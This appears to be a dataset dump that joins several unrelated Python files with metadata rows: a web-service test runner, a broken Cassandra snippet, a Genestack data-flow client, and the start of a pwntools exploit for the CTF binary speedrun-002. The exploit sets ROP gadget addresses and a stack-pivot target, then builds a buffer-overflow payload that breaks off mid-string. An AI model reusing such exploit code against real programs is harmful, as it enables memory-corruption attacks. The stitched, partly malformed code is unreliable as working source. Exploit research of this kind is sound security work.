SERVER_OUT_ERR_FN = "test-server-stdouterr.txt"
FAILED_TESTS, ERRORED_TESTS = [], []
if __name__ == '__main__':
import argparse
import codecs
import sys
import os
parser = argparse.ArgumentParser(description="Runs the otc-tol-ws and tests described in method.json files")
parser.add_argument('--taxonomy-dir', required=True, help='Directory that is the parent of the taxonomy files')
parser.add_argument('--synthesis-parent', required=True, help='Directory that is the parent of synthesis directories (if there is more than one subdirectory, then there will be multiple trees served - that option is not well tested).')
parser.add_argument('--exe-dir', required=True, help='Directory that holds the otc-tol-ws executable and which will be the working directory of the server.')
parser.add_argument('--tests-parent', required=True, help='Directory. Each subdir that holds a "method.json" file will be interpreted as a test.')
parser.add_argument('--test-name', default=None, required=False, help='Name of a subdir of the tests-parent dir. If provided only that test will be run; otherwise all of the tests will be run.')
parser.add_argument('--server-port', default=1985, type=int, required=False, help='Port number for the server')
parser.add_argument('--server-threads', default=4, type=int, required=False, help='Number of threads for the server')
parser.add_argument('--test-threads', default=8, type=int, required=False, help='Number of threads launched for running tests.')
parser.add_argument('--secs-to-recheck-pid-file', default=0, type=int, required=False, help='If the pid file exists, the process will enter a loop sleeping and rechecking for this number of seconds.')
args = parser.parse_args()
if args.server_threads < 1 or args.test_threads < 1:
sys.exit("The number of threads must be positive.")
taxonomy_dir = args.taxonomy_dir
if not os.path.isdir(taxonomy_dir):
sys.exit('Taxonomy directory "{}" does not exist.\n'.format(taxonomy_dir))
synth_par_path = args.synthesis_parent
if not os.path.isdir(synth_par_path):
sys.exit('Synthetic tree parent directory "{}" does not exist.\n'.format(synth_par_path))
exe_dir = args.exe_dir
if not os.path.isdir(exe_dir):
sys.exit('Executable directory "{}" does not exist.\n'.format(exe_dir))
test_par = args.tests_parent
if not os.path.isdir(test_par):
sys.exit('Tests parent directory "{}" does not exist.\n'.format(test_par))
if args.test_name is not None:
e_dir_list = [args.test_name]
else:
e_dir_list = get_test_dirs_under(test_par)
e_dir_list.sort()
SERVER_PORT = args.server_port
# Get test paths
to_run = []
for e_subdir_name in e_dir_list:
e_path = os.path.join(test_par, e_subdir_name)
if not os.path.isdir(e_path):
sys.stderr.write("Skipping test {} due to missing dir {} \n".format(e_subdir_name, e_path))
continue
mfile = os.path.join(e_path, "method.json")
if not os.path.isfile(mfile):
sys.stderr.write("Skipping test {} due to missing file {}\n".format(e_subdir_name, mfile))
continue
to_run.append(e_path)
if not to_run:
sys.exit("No test were found!")
# Check that there are no PIDfiles in the way
pidfile_path = os.path.join(exe_dir, PIDFILE_NAME)
if os.path.exists(pidfile_path):
recheck = 0
checks_per_sec = 3
while recheck < checks_per_sec*args.secs_to_recheck_pid_file:
recheck += 1
time.sleep(1.0/checks_per_sec)
if not os.path.exists(pidfile_path):
break
if os.path.exists(pidfile_path):
sys.exit("{} is in the way!\n".format(pidfile_path))
# try launching otc-tol-ws and running the tests against it.
for i in range(2):
if launch_server(exe_dir=exe_dir,
taxonomy_dir=taxonomy_dir,
synth_par=synth_par_path,
server_threads=args.server_threads):
try:
num_passed, nf, ne = run_tests(test_par, to_run, args.test_threads)
finally:
kill_server(exe_dir)
NUM_TESTS = nf + ne + num_passed
assert nf == len(FAILED_TESTS)
assert ne == len(ERRORED_TESTS)
sys.stderr.write('Passed {p:d}/{t:d} tests.'.format(p=num_passed, t=NUM_TESTS))
if FAILED_TESTS:
sys.stderr.write(' Failed:\n {}\n'.format('\n '.join(FAILED_TESTS)))
if ERRORED_TESTS:
sys.stderr.write(' Errors in:\n {}\n'.format('\n '.join(ERRORED_TESTS)))
if nf + ne > 0:
sys.exit(nf + ne)
sys.stderr.write('SUCCESS\n')
sys.exit(0)
else:
time.sleep(1) # relaunch (most likely cause is the port not being freed from previous test)
_LOG.error("Server launch failed: ")
with open(os.path.join(exe_dir, SERVER_OUT_ERR_FN), 'r') as seo:
sys.stderr.write(seo.read())
sys.exit(-1)
| 42.377682 | 239 | 0.577172 | #!/usr/bin/env python
import subprocess
import requests
import json
import time
import logging
try:
from Queue import Queue
except:
from queue import Queue
from threading import Thread, RLock
_LOG = logging.getLogger(__name__)
_LOG.setLevel(logging.DEBUG)
_lh = logging.StreamHandler()
_lh.setFormatter(logging.Formatter("[%(asctime)s] %(filename)s (%(lineno)3d): %(levelname) 8s: %(message)s"))
_LOG.addHandler(_lh)
NUM_TESTS = 0
FAILED_TESTS = []
FRAC_FLOAT_DIFF_TOL = 0.001
def _extend_diff_list(diff_list, r):
if r:
if isinstance(r, list):
diff_list.extend(r)
else:
diff_list.append(r)
def gen_dict_diff_str(expected, observed, ex_pref, obs_pref):
if expected == observed:
return None
diff_list = []
if isinstance(expected, dict):
if not isinstance(observed, dict):
return '{} is a dict, but {} is a {}'.format(ex_pref, obs_pref, type(observed))
for ek, ev in expected.items():
if ek in observed:
ov = observed[ek]
if ov != ev:
matched_as_floats = False
if isinstance(ev, float):
try:
if abs(ev - ov)/abs(ev) <= FRAC_FLOAT_DIFF_TOL:
matched_as_floats = True
except:
pass
if not matched_as_floats:
r = gen_dict_diff_str(ev, ov, '{}["{}"]'.format(ex_pref, ek), '{}["{}"]'.format(obs_pref, ek))
_extend_diff_list(diff_list, r)
else:
diff_list.append('{}["{}"] is absent'.format(obs_pref, ek))
for k in observed.keys():
if k not in expected:
diff_list.append('{}["{}"] was present, but not an expected key'.format(obs_pref, k))
elif isinstance(expected, list) or isinstance(expected, tuple):
if not isinstance(observed, list) or isinstance(observed, tuple):
return '{} is a list, but {} is a {}'.format(ex_pref, obs_pref, type(observed))
if len(expected) != len(observed):
diff_list.append('{} had {} elments but {} has {}'.format(ex_pref, len(expected), obs_pref, len(observed)))
else:
ml = len(expected)
for ind in range(ml):
eel, oel = expected[ind], observed[ind]
if eel != oel:
r = gen_dict_diff_str(eel, oel, '{}[{}]'.format(ex_pref, ind), '{}[{}]'.format(obs_pref, ind))
_extend_diff_list(diff_list, r)
elif type(expected) == type(observed):
return ['{} = {}, but {} = {}'.format(ex_pref, repr(expected), obs_pref, repr(observed))]
else:
return ['{} is the {} equal to {}, but {} is a {}'.format(ex_pref, type(expected), repr(expected), obs_pref, type(observed))]
return diff_list
def gen_expected_obs_diff(expected, observed, tag):
return gen_dict_diff_str(expected, observed, 'Expected {}'.format(tag), 'Observed {}'.format(tag))
#########################################################################################
# The following code for execution in a non-blocking thread is from pyraphyletic. If
# we moved it to peyotl, we could import it from there (at the cost of making)
# otcetera depend on peyot.
class JobQueue(Queue):
"""Thread-safe Queue that logs the addition of a job to debug"""
def put(self, item, block=None, timeout=None):
"""Logs `item` at the debug level then calls base-class put"""
_LOG.debug("%s queued" % str(item))
Queue.put(self, item, block=block, timeout=timeout)
_jobq = JobQueue()
def worker():
"""Infinite loop of getting jobs off of _jobq and performing them."""
while True:
job = _jobq.get()
_LOG.debug('"{}" started"'.format(job))
try:
job.start()
except:
_LOG.exception("Worker dying.")
else:
try:
job.get_results()
except:
_LOG.exception("Worker exception. Error in job.get_results")
_LOG.debug('"{}" completed'.format(job))
_jobq.task_done()
_WORKER_THREADS = []
def start_worker(num_workers):
"""Spawns worker threads such that at least `num_workers` threads will be
launched for processing jobs in the jobq.
The only way that you can get more than `num_workers` threads is if you
have previously called the function with a number > `num_workers`.
(worker threads are never killed).
"""
assert num_workers > 0, "A positive number must be passed as the number of worker threads"
num_currently_running = len(_WORKER_THREADS)
for i in range(num_currently_running, num_workers):
_LOG.debug("Launching Worker thread #%d" % i)
t = Thread(target=worker)
_WORKER_THREADS.append(t)
t.setDaemon(True)
t.start()
#########################################################################################
_verb_name_to_req_method = {"GET": requests.get,
"PUT": requests.put,
"POST": requests.post,
"DELETE": requests.delete,
"HEAD": requests.head,
"OPTIONS": requests.options,
}
API_HEADERS = {'content-type' : 'application/json',
'accept' : 'application/json',
}
class WebServiceTestJob(object):
def __init__(self, test_par, test_description, service_prefix):
self.url_fragment = test_description["url_fragment"]
self.arguments = test_description["arguments"]
v = test_description.get("verb", "GET").upper()
self.requests_method = _verb_name_to_req_method[v]
self.service_prefix = service_prefix
self.url = service_prefix + self.url_fragment
self.expected = test_description.get('expected_response_payload')
self.expected_status = test_description.get('expected_status_code')
self._status_str = None
self.passed = False
self.failed = False
self.erred = False
self.test_par = test_par
self.test_dir = test_description.get("test_dir")
self.test_subdir = os.path.relpath(self.test_dir, self.test_par)
self.name = test_description.get("name", self.test_subdir or self.url_fragment)
self.stat_lock = RLock()
@property
def status_str(self):
with self.stat_lock:
if self._status_str is None:
x = None
else:
x = str(self._status_str)
return x
@status_str.setter
def status_str(self, value):
with self.stat_lock:
self._status_str = value
def __str__(self):
return 'WebServiceTestJob {}'.format(self.name)
def run_ws_test(self):
self.status_str = ''
try:
# 1. Make the call
if self.arguments:
_LOG.debug("{} arguments = {}".format(self.name, repr(self.arguments)))
response = self.requests_method(self.url, headers=API_HEADERS, data=json.dumps(self.arguments))
else:
response = self.requests_method(self.url)
# 2.A Raise exception if we expected status 200 and didn't get it.
if self.expected_status == 200:
try:
response.raise_for_status()
except Exception as sce:
_LOG.exception('exception url: {}'.format(self.url))
try:
self.status_str = "Non-200 response body = {}\n".format(response.text)
except:
pass
raise sce
# 2.B. Return if we expected an error code and didn't get it
elif response.status_code != self.expected_status:
self.failed = True
try:
self.status_str = "Expected status {} but got {}. response body = \n{}\n".format(self.expected_status, response.status_code, response.text)
except:
pass
# 3. Check JSON body
_LOG.debug('name: {} Expected: {}'.format(self.name, self.expected))
if self.expected is not None:
try:
j = response.json()
except:
_LOG.error("{} no JSON in response: {}".format(self.name, response.text))
raise
_LOG.debug('name: {} Observed: {}'.format(self.name, j))
if j != self.expected:
dd = gen_expected_obs_diff(self.expected, j, 'x')
if dd:
self.failed = True
if self.test_dir:
dbout_observed = os.path.join(self.test_dir, "observed.json")
with codecs.open(dbout_observed, 'w', encoding="utf-8") as obsfo:
json.dump(j, obsfo, sort_keys=True, indent=2, separators=(',', ': '))
m = 'Response written to {}'.format(dbout_observed)
else:
m = ''
self.status_str += "Wrong response:\n{}\n{}".format('\n'.join(dd), m)
if self.failed:
return
else:
self.passed = True
self.status_str = "Completed"
except Exception as x:
self.erred = True
_LOG.exception('writing exception to status string')
self.status_str += "Exception: {}".format(x)
def start(self):
"""Trigger to start push - blocking"""
self.run_ws_test()
def get_results(self):
""":return self.status_str"""
return self.status_str
#########################################################################################
PIDFILE_NAME = "pidfile.txt"
RUNNING_SERVER = None
SERVER_PORT = 1985 # global, set by CLI. Needed by server launch and threads
SERVER_OUT_ERR_FN = "test-server-stdouterr.txt"
def launch_server(exe_dir, taxonomy_dir, synth_par, server_threads=4):
global RUNNING_SERVER
exe_path = os.path.join(exe_dir, 'otc-tol-ws')
pidfile_path = os.path.join(exe_dir, PIDFILE_NAME)
server_std_out = os.path.join(exe_dir, SERVER_OUT_ERR_FN)
invocation = [exe_path,
taxonomy_dir,
"-D" + synth_par,
"-p{}".format(pidfile_path),
"-P{}".format(SERVER_PORT),
"--num-threads={}".format(server_threads)]
_LOG.debug('Launching with: "{}"'.format('" "'.join(invocation)))
with open(server_std_out, 'w') as sstdoe:
RUNNING_SERVER = subprocess.Popen(invocation,
stdout=sstdoe,
stderr=subprocess.STDOUT)
wc = 0
while (RUNNING_SERVER.poll() is None) and (not os.path.exists(pidfile_path)):
time.sleep(0.1)
if wc > 100:
raise RuntimeError("Assuming that the server has hung after waiting for pidfile")
wc += 1
return (RUNNING_SERVER.poll() is None) and (os.path.exists(pidfile_path))
def kill_server(exe_dir):
if os.environ.get("PROMPT_BEFORE_KILLING_SERVER"):
c = raw_input("type any key to kill the server... ")
pidfile_path = os.path.join(exe_dir, PIDFILE_NAME)
if RUNNING_SERVER.poll() is None:
RUNNING_SERVER.terminate()
if RUNNING_SERVER.poll() is None:
RUNNING_SERVER.kill()
wc = 0
while RUNNING_SERVER.poll() is None:
time.sleep(0.1)
wc += 1
if wc > 100:
break
if RUNNING_SERVER.poll() is None:
sys.stderr.write("Could not kill server! Kill it then remove the pidfile.txt\n")
else:
if os.path.exists(pidfile_path):
os.remove(pidfile_path)
sys.stderr.write("Server no longer running and pidfile removed.\n")
FAILED_TESTS, ERRORED_TESTS = [], []
def run_tests(test_par, dirs_to_run, test_threads):
assert test_threads > 0
td_list = []
for test_dir in dirs_to_run:
with codecs.open(os.path.join(test_dir, "method.json")) as inp:
td = json.load(inp)
if os.path.exists(os.path.join(test_dir, "expected.json")):
with codecs.open(os.path.join(test_dir, "expected.json")) as inp:
td["expected_response_payload"] = json.load(inp)
if os.path.exists(os.path.join(test_dir, "expected_code.txt")):
with codecs.open(os.path.join(test_dir, "expected_code.txt")) as inp:
lines = inp.readlines()
td["expected_status_code"] = int(lines[0])
else:
td["expected_status_code"] = 200
td["test_dir"] = test_dir
td_list.append(td)
start_worker(test_threads)
service_prefix = "http://127.0.0.1:{}/".format(SERVER_PORT)
all_jobs = [WebServiceTestJob(test_par=test_par, test_description=td, service_prefix=service_prefix) for td in td_list]
running_jobs = list(all_jobs)
for j in all_jobs:
_jobq.put(j)
# now we block until all jobs have a status_str
num_passed = 0
num_failed = 0
num_errors = 0
while True:
srj = []
for j in running_jobs:
jss = j.status_str
if not jss:
# _LOG.debug('putting {} back in queue'.format(j.name))
srj.append(j)
continue
_LOG.debug('test {} status_str = {} resolved'.format(j.name, repr(jss)))
if j.erred or j.failed:
if j.failed:
fc = "FAILURE"
num_failed += 1
FAILED_TESTS.append(j.name)
else:
fc = "ERROR"
num_errors += 1
ERRORED_TESTS.append(j.name)
_LOG.error("{} {}: {}".format(j.name, fc, j.status_str))
else:
num_passed += 1
_LOG.debug("{} passed.".format(j.name))
if not srj:
break
running_jobs = srj
time.sleep(0.1)
return num_passed, num_failed, num_errors
def get_test_dirs_under(top_test_dir):
test_dirs = []
for root, dirs, files in os.walk(top_test_dir):
if "method.json" in files:
path = os.path.relpath(root, top_test_dir)
test_dirs.insert(0,path)
return test_dirs
if __name__ == '__main__':
import argparse
import codecs
import sys
import os
parser = argparse.ArgumentParser(description="Runs the otc-tol-ws and tests described in method.json files")
parser.add_argument('--taxonomy-dir', required=True, help='Directory that is the parent of the taxonomy files')
parser.add_argument('--synthesis-parent', required=True, help='Directory that is the parent of synthesis directories (if there is more than one subdirectory, then there will be multiple trees served - that option is not well tested).')
parser.add_argument('--exe-dir', required=True, help='Directory that holds the otc-tol-ws executable and which will be the working directory of the server.')
parser.add_argument('--tests-parent', required=True, help='Directory. Each subdir that holds a "method.json" file will be interpreted as a test.')
parser.add_argument('--test-name', default=None, required=False, help='Name of a subdir of the tests-parent dir. If provided only that test will be run; otherwise all of the tests will be run.')
parser.add_argument('--server-port', default=1985, type=int, required=False, help='Port number for the server')
parser.add_argument('--server-threads', default=4, type=int, required=False, help='Number of threads for the server')
parser.add_argument('--test-threads', default=8, type=int, required=False, help='Number of threads launched for running tests.')
parser.add_argument('--secs-to-recheck-pid-file', default=0, type=int, required=False, help='If the pid file exists, the process will enter a loop sleeping and rechecking for this number of seconds.')
args = parser.parse_args()
if args.server_threads < 1 or args.test_threads < 1:
sys.exit("The number of threads must be positive.")
taxonomy_dir = args.taxonomy_dir
if not os.path.isdir(taxonomy_dir):
sys.exit('Taxonomy directory "{}" does not exist.\n'.format(taxonomy_dir))
synth_par_path = args.synthesis_parent
if not os.path.isdir(synth_par_path):
sys.exit('Synthetic tree parent directory "{}" does not exist.\n'.format(synth_par_path))
exe_dir = args.exe_dir
if not os.path.isdir(exe_dir):
sys.exit('Executable directory "{}" does not exist.\n'.format(exe_dir))
test_par = args.tests_parent
if not os.path.isdir(test_par):
sys.exit('Tests parent directory "{}" does not exist.\n'.format(test_par))
if args.test_name is not None:
e_dir_list = [args.test_name]
else:
e_dir_list = get_test_dirs_under(test_par)
e_dir_list.sort()
SERVER_PORT = args.server_port
# Get test paths
to_run = []
for e_subdir_name in e_dir_list:
e_path = os.path.join(test_par, e_subdir_name)
if not os.path.isdir(e_path):
sys.stderr.write("Skipping test {} due to missing dir {} \n".format(e_subdir_name, e_path))
continue
mfile = os.path.join(e_path, "method.json")
if not os.path.isfile(mfile):
sys.stderr.write("Skipping test {} due to missing file {}\n".format(e_subdir_name, mfile))
continue
to_run.append(e_path)
if not to_run:
sys.exit("No test were found!")
# Check that there are no PIDfiles in the way
pidfile_path = os.path.join(exe_dir, PIDFILE_NAME)
if os.path.exists(pidfile_path):
recheck = 0
checks_per_sec = 3
while recheck < checks_per_sec*args.secs_to_recheck_pid_file:
recheck += 1
time.sleep(1.0/checks_per_sec)
if not os.path.exists(pidfile_path):
break
if os.path.exists(pidfile_path):
sys.exit("{} is in the way!\n".format(pidfile_path))
# try launching otc-tol-ws and running the tests against it.
for i in range(2):
if launch_server(exe_dir=exe_dir,
taxonomy_dir=taxonomy_dir,
synth_par=synth_par_path,
server_threads=args.server_threads):
try:
num_passed, nf, ne = run_tests(test_par, to_run, args.test_threads)
finally:
kill_server(exe_dir)
NUM_TESTS = nf + ne + num_passed
assert nf == len(FAILED_TESTS)
assert ne == len(ERRORED_TESTS)
sys.stderr.write('Passed {p:d}/{t:d} tests.'.format(p=num_passed, t=NUM_TESTS))
if FAILED_TESTS:
sys.stderr.write(' Failed:\n {}\n'.format('\n '.join(FAILED_TESTS)))
if ERRORED_TESTS:
sys.stderr.write(' Errors in:\n {}\n'.format('\n '.join(ERRORED_TESTS)))
if nf + ne > 0:
sys.exit(nf + ne)
sys.stderr.write('SUCCESS\n')
sys.exit(0)
else:
time.sleep(1) # relaunch (most likely cause is the port not being freed from previous test)
_LOG.error("Server launch failed: ")
with open(os.path.join(exe_dir, SERVER_OUT_ERR_FN), 'r') as seo:
sys.stderr.write(seo.read())
sys.exit(-1)
| 10,883 | 387 | 183 |
76e4e379bdb364fc335472dd11b27d14c6dc3696 | 1,572 | py | Python | coinds/cassandra/poll_coins.py | skwongg/coins | fe9840cdee6bdf10854d5312e6fc52154c081dfc | [
"MIT"
] | 1 | 2018-03-06T01:59:57.000Z | 2018-03-06T01:59:57.000Z | coinds/cassandra/poll_coins.py | skwongg/coins | fe9840cdee6bdf10854d5312e6fc52154c081dfc | [
"MIT"
] | 2 | 2020-06-05T17:07:09.000Z | 2021-06-10T18:10:16.000Z | coinds/cassandra/poll_coins.py | skwongg/coins | fe9840cdee6bdf10854d5312e6fc52154c081dfc | [
"MIT"
] | null | null | null | from cassandra.cluster import Cluster
from cassandra.cqlengine import connection
from cassandra.cqlengine.management import sync_table
from coins import Coin
CQLENG_ALLOW_SCHEMA_MANAGEMENT='CQLENG_ALLOW_SCHEMA_MANAGEMENT'
cluster=Cluster()
connection.setup(['127.0.0.1'], "cassy", protocol_version=3)
class CoinPrice
a = Coin()
##Cassandra coin model syncs to default cassandra connection under cassy keyspace.
##row key for time series data https://academy.datastax.com/resources/getting-started-time-series-data-modeling
#row partitioning:
# In some cases, the amount of data gathered for a single device isn’t practical to fit onto a single row. Cassandra can store up to 2 billion columns per row, but if we’re storing data every millisecond you wouldn’t even get a month’s worth of data. The solution is to use a pattern called row partitioning by adding data to the row key to limit the amount of columns you get per device. Using data already available in the event, we can use the date portion of the timestamp and add that to the weather station id. This will give us a row per day, per weather station, and an easy way to find the data. (figure 2)
# day = datetime.date.today().strftime('%m-%d-%Y')
# name = "XRP"
# ticker="XRPUSD"
# pair="XRPUSD"
# icon_url="https://www.google.com"
# price="0.8934"
# price=0.8934
# btc_price=0.00001
# created_at=datetime.datetime.now()
# source = "binance"
# a = Coin.create(day=day, name=name, ticker=ticker, pair=pair, icon_url=icon_url, price=price, btc_price=btc_price, source="binance", created_at=created_at)
| 46.235294 | 615 | 0.771628 | from cassandra.cluster import Cluster
from cassandra.cqlengine import connection
from cassandra.cqlengine.management import sync_table
from coins import Coin
CQLENG_ALLOW_SCHEMA_MANAGEMENT='CQLENG_ALLOW_SCHEMA_MANAGEMENT'
cluster=Cluster()
connection.setup(['127.0.0.1'], "cassy", protocol_version=3)
class CoinPrice
a = Coin()
##Cassandra coin model syncs to default cassandra connection under cassy keyspace.
##row key for time series data https://academy.datastax.com/resources/getting-started-time-series-data-modeling
#row partitioning:
# In some cases, the amount of data gathered for a single device isn’t practical to fit onto a single row. Cassandra can store up to 2 billion columns per row, but if we’re storing data every millisecond you wouldn’t even get a month’s worth of data. The solution is to use a pattern called row partitioning by adding data to the row key to limit the amount of columns you get per device. Using data already available in the event, we can use the date portion of the timestamp and add that to the weather station id. This will give us a row per day, per weather station, and an easy way to find the data. (figure 2)
# day = datetime.date.today().strftime('%m-%d-%Y')
# name = "XRP"
# ticker="XRPUSD"
# pair="XRPUSD"
# icon_url="https://www.google.com"
# price="0.8934"
# price=0.8934
# btc_price=0.00001
# created_at=datetime.datetime.now()
# source = "binance"
# a = Coin.create(day=day, name=name, ticker=ticker, pair=pair, icon_url=icon_url, price=price, btc_price=btc_price, source="binance", created_at=created_at)
| 0 | 0 | 0 |
b1edd974dc7790b129ef197cf1042e0dc3dc1c81 | 3,695 | py | Python | genestack_client/data_flow_editor.py | genestack/python-client | 083eb0508dc99c7575ba7f115595f2535f007583 | [
"MIT"
] | 2 | 2017-08-30T22:32:59.000Z | 2021-07-20T10:08:23.000Z | genestack_client/data_flow_editor.py | genestack/python-client | 083eb0508dc99c7575ba7f115595f2535f007583 | [
"MIT"
] | 58 | 2015-10-19T08:36:00.000Z | 2020-12-07T13:48:17.000Z | genestack_client/data_flow_editor.py | genestack/python-client | 083eb0508dc99c7575ba7f115595f2535f007583 | [
"MIT"
] | 6 | 2015-10-21T21:43:45.000Z | 2021-01-06T20:33:53.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import *
from genestack_client import Application, FilesUtil, GenestackException, Metainfo
| 39.308511 | 118 | 0.661434 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import *
from genestack_client import Application, FilesUtil, GenestackException, Metainfo
class DataFlowEditor(Application):
APPLICATION_ID = 'genestack/datafloweditor'
def __init__(self, connection, application_id=None):
Application.__init__(self, connection, application_id)
self.__cache = {}
def create_dataflow(self, accession, name=None):
"""
Creates a data flow based on the file provenance of the specified file.
The nodes of the data flow can be accessed by the accession of the corresponding files in the file provenance.
:param accession: file accession
:type accession: str
:param name: data flow name
:type name: str
:return: accession of the created data flow file
:rtype: str
:raise GenestackException:
"""
response = self.invoke('initializeApplicationState', 'createFromSources', accession)
if response['type'] == 'newPage':
accession = response['fileInfo']['accession']
elif response['type'] == 'existingPages':
# If file already exists we expect to get the last created file.
# Existing page contains files from first to last (or MAX QUERY)
# TODO: in case there are more files then MAX QUERY (100 ATM),
# the last file in response will not be really last
# (it is almost impossible use case, though)
file_info = response['fileInfos'][-1]
accession = file_info['accession']
else:
raise GenestackException("Unknown response type: %s" % response['type'])
if name:
FilesUtil(self.connection).replace_metainfo_string_value([accession], Metainfo.NAME, name)
return accession
def add_files(self, page_accession, node_accession, files):
"""
Add files to a data flow node.
:param page_accession: accession of data flow file
:type page_accession: str
:param node_accession: accession of origin file in node
:type node_accession: str
:param files: list of accessions of files to add to the node
:type files: list
:rtype: None
"""
node = self.__get_node_by_accession(page_accession, node_accession)
self.invoke('addFiles', files, node, page_accession)
def clear_node(self, page_accession, node_accession):
"""
Remove all files from a data flow node.
:param page_accession: accession of data flow file
:type page_accession: str
:param node_accession: accession of origin file in node
:type node_accession: str
:rtype: None
"""
node = self.__get_node_by_accession(page_accession, node_accession)
self.invoke('clearFile', node, page_accession)
def __get_graph(self, page_accession):
"""
Cache graph, to avoid extra requests.
"""
if page_accession not in self.__cache:
self.__cache[page_accession] = self.invoke('getFlowData', page_accession)
return self.__cache[page_accession]
def __get_node_by_accession(self, page_accession, accession):
"""
Return node id by its accession.
"""
for node, node_data in self.__get_graph(page_accession)['fullGraph'].items():
if accession in node_data['userData']['originalAccessions']:
return node
| 120 | 3,201 | 23 |
299fd36aab0da8b10d2e00a4a1f71ae4cf849959 | 12,847 | py | Python | examples/defcon27-quals-speedrun-002/exploit_0.py | SQLab/CRAXplusplus | 0cef3434c37eea73e72e0e75332c8d67e73741cd | [
"MIT"
] | 15 | 2022-01-04T16:58:52.000Z | 2022-03-28T18:01:55.000Z | examples/defcon27-quals-speedrun-002/exploit_0.py | aesophor/CRAXplusplus | caacbeb4fadb5452ac3bf2faf5aff33580d19cca | [
"MIT"
] | 7 | 2022-01-04T13:07:18.000Z | 2022-03-24T14:38:13.000Z | examples/defcon27-quals-speedrun-002/exploit_0.py | SQLab/CRAXplusplus | 0cef3434c37eea73e72e0e75332c8d67e73741cd | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from pwn import *
context.update(arch = 'amd64', os = 'linux', log_level = 'info')
target = ELF('./target', checksec=False)
libc_2_24_so = ELF('./libc-2.24.so', checksec=False)
__libc_csu_init = 0x400840
__libc_csu_init_call_target = 0x400e48
__libc_csu_init_gadget1 = 0x400896
__libc_csu_init_gadget2 = 0x400880
canary = 0x0
libc_2_24_so_base = 0x0
pivot_dest = 0x601860
target_base = 0x0
target_leave_ret = 0x40074a
target_pop_rbp_ret = 0x400668
if __name__ == '__main__':
proc = process(['./ld-2.24.so', './target'], env={'LD_PRELOAD': './libc-2.24.so'})
payload = b'\x45\x76\x65\x72\x79\x74\x68\x69\x6e\x67\x20\x69\x6e\x74\x65\x6c\x6c\x69\x67\x65\x6e\x74\x20\x69\x73\x20\x73\x6f\x20\x62\x6f\x72\x69\x6e\x67\x2e\x6e\x57\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\